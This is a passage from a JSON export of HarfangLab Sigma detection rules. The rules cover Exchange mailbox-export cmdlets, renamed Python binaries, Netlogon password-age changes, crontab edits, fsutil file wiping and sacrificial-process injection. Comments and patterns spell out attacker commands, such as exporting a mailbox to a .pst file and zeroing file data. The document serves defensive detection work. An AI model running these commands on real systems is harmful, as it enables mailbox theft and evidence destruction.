"https://www.zerodayinitiative.com/blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell",
"https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps",
"https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1114/002/"
],
"name": "t1059_001_powershell_suspicious_exchange_cmdlets.yml",
"content": "title: Suspicious Microsoft Exchange Cmdlet via PowerShell\nid: 5e3aa973-aa80-4aab-bd67-4ab462e4221c\ndescription: |\n Detects the usage of suspicious Exchange PowerShell cmdlets.\n New-ManagementRoleAssignment can be used to assign a management role to a user and can be abused to add the Mailbox Import Export role in order to export a specific mailbox.\n New-MailboxExportRequest can be used to export contents of a mailbox to a .pst file.\n These cmdlets can be abused by attackers in order to exfiltrate users mailbox.\n It is recommended to analyze the mailbox export requests for legitimacy, monitor for mailbox activities, and further investigate other alerts and telemtry on the endpoint.\nreferences:\n - https://www.zerodayinitiative.com/blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell\n - https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps\n - https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1114/002/\ndate: 2021/11/09\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_export:\n # New-MailboxExportRequest -Mailbox toto -FilePath C:\\Windows\\Temp\\backup.pst\n PowershellCommand|contains|all:\n - 'New-MailboxExportRequest '\n - ' -Ma'\n\n selection_role:\n # New-ManagementRoleAssignment -Role \"Mailbox Import Export\" -User \"toto\"\n PowershellCommand|contains|all:\n - 'New-ManagementRoleAssignment '\n - ' -Ro'\n\n exclusion_exchange:\n 
PowershellCommand|contains|all:\n - '# O15# 2844081 - Create PartnerApplication ?Exchange Online? in DC and On-Premise'\n - '# Create application account for Exchange'\n - 'New-ManagementRoleAssignment -Role $roleName -User $appAccount.Identity -DomainController $RoleDomainController;'\n\n exclusion_fsecure:\n PowershellCommand|contains|all:\n - '# Synopsis: This script performs F-Secure Transport Agent registration/unregistration.'\n - 'New-ManagementRoleAssignment -Name:\"F-Secure On-Demand Scanner\" -SecurityGroup:\"Exchange Servers\"'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5e3aa973-aa80-4aab-bd67-4ab462e4221c",
"rule_name": "Suspicious Microsoft Exchange Cmdlet via PowerShell",
"rule_description": "Detects the usage of suspicious Exchange PowerShell cmdlets.\nNew-ManagementRoleAssignment can be used to assign a management role to a user and can be abused to add the Mailbox Import Export role in order to export a specific mailbox.\nNew-MailboxExportRequest can be used to export contents of a mailbox to a .pst file.\nThese cmdlets can be abused by attackers in order to exfiltrate users' mailboxes.\nIt is recommended to analyze the mailbox export requests for legitimacy, monitor for mailbox activities, and further investigate other alerts and telemetry on the endpoint.\n",
"rule_creation_date": "2021-11-09",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1114.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5e50f425-f3e4-4ba5-b72b-63c61ea844e5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087811Z",
"creation_date": "2026-03-23T11:45:34.087815Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087820Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1059.006/"
],
"name": "t1059_006_renamed_python_executable.yml",
"content": "title: Renamed Python Binary Executed\nid: 5e50f425-f3e4-4ba5-b72b-63c61ea844e5\ndescription: |\n Detects the execution of a renamed Python executable.\n Adversaries may rename Python binaries to mimic legitimate processes to avoid detection.\n It is recommended to investigate the renamed executable's behavior, verify its legitimacy, and review processes for unusual activities.\nreferences:\n - https://attack.mitre.org/techniques/T1059.006/\ndate: 2023/10/31\nmodified: 2026/03/13\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.Python\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName:\n - 'python.exe'\n - 'pythonw.exe'\n - 'py.exe'\n\n filter_legitimate:\n Image|endswith:\n - '\\python*.exe'\n - '\\pip*.exe'\n - '\\idle*.exe'\n - '\\py.exe'\n - '\\pyw.exe'\n\n exclusion_dwagent:\n Image|endswith: '\\dwagent.exe'\n\n exclusion_waptpython:\n Image:\n - '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n - '?:\\Program Files\\wapt\\waptpython.exe'\n - '?:\\wapt\\waptpython.exe'\n\n exclusion_waptpythonw:\n - Image|endswith: '\\wapt\\waptpythonw.exe'\n CommandLine: '*\\wapt\\waptpythonw.exe *\\wapt\\wapt-get.py session-setup all'\n - Image: '?:\\Program Files (x86)\\wapt\\waptpythonw.exe'\n\n exclusion_quantumatk:\n Image: '?:\\Program Files\\QuantumATK\\QuantumATK-*\\bin\\quantumatk.exe'\n\n exclusion_bmcsoftware:\n Image: '?:\\Program Files\\BMC Software\\Discovery Outpost\\outpostworker.exe'\n exclusion_automai:\n Image: '?:\\Automai\\Director\\WebServ\\bin\\Py\\Scripts\\\\*.exe'\n\n exclusion_virtualenvs:\n Image|endswith: 'virtualenvs\\\\*\\Scripts\\python3'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5e50f425-f3e4-4ba5-b72b-63c61ea844e5",
"rule_name": "Renamed Python Binary Executed",
"rule_description": "Detects the execution of a renamed Python executable.\nAdversaries may rename Python binaries to mimic legitimate processes to avoid detection.\nIt is recommended to investigate the renamed executable's behavior, verify its legitimacy, and review processes for unusual activities.\n",
"rule_creation_date": "2023-10-31",
"rule_modified_date": "2026-03-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5e5224bd-6c47-4a50-8706-a614438c7c55",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621615Z",
"creation_date": "2026-03-23T11:45:34.621617Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621622Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/maximum-password-age",
"https://attack.mitre.org/techniques/T1098/"
],
"name": "t1098_maximum_netlogon_password_changes.yml",
"content": "title: Maximum Automatic Machine Account Password Age Changed\nid: 5e5224bd-6c47-4a50-8706-a614438c7c55\ndescription: |\n Detects a registry modification changing the maximum password age on the local host.\n Attackers may try to change such settings to reduce scope of an existing hardening and to maintain access as long as possible.\n It is recommended to analyze the process responsible for this registry edit as well as to look for malicious actions by the same user around the alert.\nreferences:\n - https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/maximum-password-age\n - https://attack.mitre.org/techniques/T1098/\ndate: 2020/10/20\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1098\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\Netlogon\\Parameters\\MaximumPasswordAge'\n\n filter_short_password_age:\n # Image: 'C:\\Windows\\System32\\services.exe' # if set by a 3rd party softare, wouldn't match\n Details:\n # the reasoning here is, an attacker would probably set this to a high value (365 days or more?)\n # 0 to 95 days (some companies have a password policy set to 90 days and set the same LAPS password age)\n - 'DWORD (0x0000000?)' # 0-15 days\n - 'DWORD (0x0000001?)' # 16-31 days\n - 'DWORD (0x0000002?)' # 32-47 days\n - 'DWORD (0x0000003?)' # 48-63 days\n - 'DWORD (0x0000004?)' # 64-79 days\n - 'DWORD (0x0000005?)' # 80-95 days\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s 
gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\n# level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5e5224bd-6c47-4a50-8706-a614438c7c55",
"rule_name": "Maximum Automatic Machine Account Password Age Changed",
"rule_description": "Detects a registry modification changing the maximum password age on the local host.\nAttackers may try to change such settings to reduce the scope of an existing hardening measure and to maintain access as long as possible.\nIt is recommended to analyze the process responsible for this registry edit as well as to look for malicious actions by the same user around the alert.\n",
"rule_creation_date": "2020-10-20",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1098",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5e67f495-82f8-4ec4-8384-c59ee7db5876",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.527733Z",
"creation_date": "2026-03-23T11:45:35.294057Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294064Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_crontab_edit_linux.yml",
"content": "title: Cron Jobs Edited via crontab\nid: 5e67f495-82f8-4ec4-8384-c59ee7db5876\ndescription: |\n Detects the execution of the crontab command to edit cron jobs.\n Attackers can use crontab to add a malicious cron jobs for persistence.\n It is recommended to investigate what modifications were made as well as to check the parent process for suspicious activities.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2023/01/04\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.ScheduledTask\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_image:\n Image|endswith: '/crontab'\n ParentImage|contains: '?'\n\n # We are interested in matching `crontab ` and `crontab -e`, but to simplify we will\n # match anything but a few unrelated flags\n filter_harmless_flags:\n CommandLine|contains:\n - ' -l'\n - ' -V'\n - ' -T'\n - ' -r'\n\n exclusion_commandline:\n CommandLine|startswith:\n - 'crontab /opt/application/'\n - 'crontab /tmp/crontab'\n - '/bin/crontab /tmp/crontab'\n - '/usr/bin/crontab /tmp/crontab'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_plesk:\n CommandLine: '/usr/bin/crontab -u psaadm /usr/local/psa/tmp/?????????'\n ParentImage: '/usr/local/psa/admin/sbin/crontabmng'\n\n exclusion_vm:\n CommandLine: 'crontab /usr/vm/bin/run_cron'\n ParentCommandLine:\n - '/bin/bash /etc/cron.hourly/89NPMhourly'\n - '/bin/bash /bin/run-parts /etc/cron.hourly'\n - '/bin/bash -c sleep $(((RANDOM%5)));run-parts /etc/cron.hourly'\n\n exclusion_puppet:\n - 
ParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - GrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_flexit_modify_crontab_php:\n # php /home/flexit/flexitv2/flexit/site/www/backoffice/modules/cron/front/batch/modify_crontab.php\n GrandparentImage: '/usr/bin/php?.?'\n GrandparentCommandLine|endswith: '/flexit/flexitv2/flexit/site/www/backoffice/modules/cron/front/batch/modify_crontab.php'\n\n exclusion_dpkg:\n GrandparentImage: '/usr/bin/dpkg'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n condition: selection_image and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5e67f495-82f8-4ec4-8384-c59ee7db5876",
"rule_name": "Cron Jobs Edited via crontab",
"rule_description": "Detects the execution of the crontab command to edit cron jobs.\nAttackers can use crontab to add malicious cron jobs for persistence.\nIt is recommended to investigate what modifications were made as well as to check the parent process for suspicious activities.\n",
"rule_creation_date": "2023-01-04",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5e8f7d64-f9ba-4111-851d-2e07c745b2d0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069944Z",
"creation_date": "2026-03-23T11:45:34.069946Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069950Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-file",
"https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt",
"https://attack.mitre.org/techniques/T1070/004/"
],
"name": "t1070_004_fsutil_setzerodata.yml",
"content": "title: File Deleted via fsutil.exe\nid: 5e8f7d64-f9ba-4111-851d-2e07c745b2d0\ndescription: |\n Detects the execution of fsutil to delete file content.\n This technique is sometimes used by adversaries to delete their ransomware binaries or to hide their traces.\n It is recommended to investigate the files being deleted by fsutil and the execution context to determine the legitimacy of this action.\nreferences:\n - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-file\n - https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2024/02/20\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Fsutil\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\fsutil.exe'\n - OriginalFileName: 'fsutil.exe'\n\n selection_commandline:\n CommandLine|contains|all:\n - ' file '\n - ' setZeroData '\n - ' offset=0 '\n - ' length='\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5e8f7d64-f9ba-4111-851d-2e07c745b2d0",
"rule_name": "File Deleted via fsutil.exe",
"rule_description": "Detects the execution of fsutil to delete file content.\nThis technique is sometimes used by adversaries to delete their ransomware binaries or to hide their traces.\nIt is recommended to investigate the files being deleted by fsutil and the execution context to determine the legitimacy of this action.\n",
"rule_creation_date": "2024-02-20",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ec7ff2f-b99d-4397-9fcc-f13cc813f7fc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623275Z",
"creation_date": "2026-03-23T11:45:34.623276Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623281Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_sacrificial_processes_no_args.yml",
"content": "title: Potential Sacrificial Process Spawned\nid: 5ec7ff2f-b99d-4397-9fcc-f13cc813f7fc\ndescription: |\n Detects suspicious system processes spawned without arguments that can be used as sacrificial ones.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n It is recommended to investigate parent-child process relationships of argumentless system processes and to isolate any suspicious instances for memory analysis.\nreferences:\n - https://attack.mitre.org/techniques/T1218/\ndate: 2020/11/23\nmodified: 2026/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1055.012\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_rundll32:\n # Default target for Cobalt Strike's spawn task.\n Image|endswith: 'rundll32.exe'\n CommandLine|endswith:\n - 'rundll32.exe'\n # Possible quoted variants\n - 'rundll32.exe\"'\n ParentImage|contains: '?'\n\n selection_werfault:\n # Used by kraken.\n Image|endswith: 'WerFault.exe'\n CommandLine|endswith:\n - 'WerFault.exe'\n # Possible quoted variants\n - 'WerFault.exe\"'\n\n selection_dllhost:\n # Used by IcedID for shellcodes.\n Image|endswith: 'dllhost.exe'\n CommandLine|endswith:\n - 'dllhost.exe'\n # Possible quoted variants\n - 'dllhost.exe\"'\n\n selection_w32tm:\n Image|endswith: 'w32tm.exe'\n CommandLine|endswith: 'w32tm.exe'\n\n selection_smartscreen:\n Image|endswith: 'smartscreen.exe'\n CommandLine|endswith: 'smartscreen.exe'\n\n selection_credentialuibroker:\n Image|endswith: 'credentialuibroker.exe'\n CommandLine|endswith: 'credentialuibroker.exe'\n\n # NOTE: We currently exclude cmd.exe as a legitime user could type those commands without arguments.\n filter_cmd:\n ParentImage|endswith: '\\windows\\system32\\cmd.exe'\n\n exclusion_setup:\n # 
seen:\n # *\\appdata\\local\\microsoft\\edge\\application\\\\*\\installer\\setup.exe\n # *\\appdata\\local\\google\\chrome\\application\\\\*\\installer\\setup.exe\n # *\\appdata\\local\\BraveSoftware\\application\\\\*\\installer\\setup.exe\n ParentImage: '*\\appdata\\local\\\\*\\application\\\\*\\installer\\setup.exe'\n\n exclusion_installer:\n Image:\n - '?:\\WINDOWS\\system32\\dllhost.exe'\n - '?:\\Windows\\SysWOW64\\dllhost.exe'\n - '?:\\Windows\\System32\\rundll32.exe'\n - '?:\\Windows\\SysWOW64\\rundll32.exe'\n ParentImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\is-?????.tmp\\\\*.tmp'\n - '?:\\Windows\\TempInst\\is-?????.tmp\\\\*.tmp'\n - '?:\\Windows\\Temp\\is-?????.tmp\\\\*.tmp'\n - '?:\\temp\\is-?????.tmp\\\\*.tmp'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\_is????.exe'\n - '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\_is????.exe'\n\n exclusion_f5:\n - ParentImage:\n - '?:\\programdata\\F5 Networks\\f5unistall.exe' # yes, there's a typo in unistall...\n - '*\\AppData\\Local\\F5 Networks\\f5unistall.exe'\n - GrandparentImage:\n - '?:\\ProgramData\\F5 Networks\\f5unistall.exe'\n - '*\\AppData\\Local\\F5 Networks\\f5unistall.exe'\n\n exclusion_lenovo_installer:\n ParentCommandLine|contains:\n # \"c:\\windows\\TempInst\\is-DB8TB.tmp\\n25sh04w.tmp\" /SL5=\"$C4155A,409762,57856,C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\n25sh04w\\n25sh04w.exe\" /VERYSILENT /DIR=C:\\PROGRA~3\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\n25sh04w\\ /EXTRACT=\"YES\"\n - ' /VERYSILENT /DIR=?:\\PROGRA~3\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\'\n # c:\\windows\\TempInst\\is-ECBDO.tmp\\n27lj01w.tmp /SL5=$6076C,486425,57856,C:\\ProgramData\\Lenovo\\ImController\\SystemPluginData\\LenovoSystemUpdatePlugin\\session\\Repository\\n27lj01w\\n27lj01w.exe /VERYSILENT /DIR=C:\\PROGRA~3\\Lenovo\\IMCONT~1\\SYSTEM~1\\LENOVO~2\\session\\REPOSI~1\\n27lj01w\\ /EXTRACT=YES\n - ' /VERYSILENT 
/DIR=?:\\PROGRA~3\\Lenovo\\IMCONT~1\\SYSTEM~1\\LENOVO~'\n # \"c:\\windows\\TempInst\\is-MB6TA.tmp\\HSW_vProChecker.tmp\" /SL5=\"$390652,290538,54272,C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\jdrg04ww\\HSW_vProChecker.exe\" /VERYSILENT /PARAM=\"-feat !!M3 Autotest!! -value !!Enabled!!\"\n - ' /VERYSILENT /PARAM=\"-feat !!M3 Autotest!! -value !!Enabled!!\"'\n # c:\\windows\\TempInst\\is-TKR5P.tmp\\HSW_vProChecker.tmp /SL5=$2C095A,290538,54272,C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\girg39ww_vpro\\HSW_vProChecker.exe /VERYSILENT /PARAM=-feat !!M3 Autotest!! -value !!Enabled!!\n - ' /VERYSILENT /PARAM=-feat !!M3 Autotest!! -value !!Enabled!!'\n # c:\\windows\\TempInst\\is-V32OO.tmp\\girg38ww.tmp /SL5=$80676,5897380,54272,C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\girg38ww_nonvpro\\girg38ww.exe /VERYSILENT /DIR=C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\girg38ww_nonvpro\\ /EXTRACT=YES\n - ' /VERYSILENT /DIR=?:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\'\n # C:\\Windows\\TEMP\\is-82VLT.tmp\\n1qvub3w.tmp /SL5=$701DC,26771463,54272,C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\n1qvub3w_win7\\n1qvub3w.exe /VERYSILENT /DIR=C:\\ProgramData\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\N1QVUB~1\\ /EXTRACT=YES\n - ' /VERYSILENT /DIR=?:\\ProgramData\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\'\n # C:\\ProgramData\\Lenovo\\Vantage\\AddinData\\LenovoSystemUpdateAddin\\session\\Repository\\grwt06ww\\grwt06ww.exe /VERYSILENT /DIR=C:\\PROGRA~3\\Lenovo\\Vantage\\ADDIND~1\\LENOVO~1\\session\\REPOSI~1\\grwt06ww\\ /EXTRACT=YES\n - '/VERYSILENT /DIR=?:\\PROGRA~3\\Lenovo\\Vantage\\ADDIND~1\\LENOVO~1\\session\\REPOSI~1\\'\n # C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\n10cp05w_10\\n10cp05w.exe /VERYSILENT /SP- 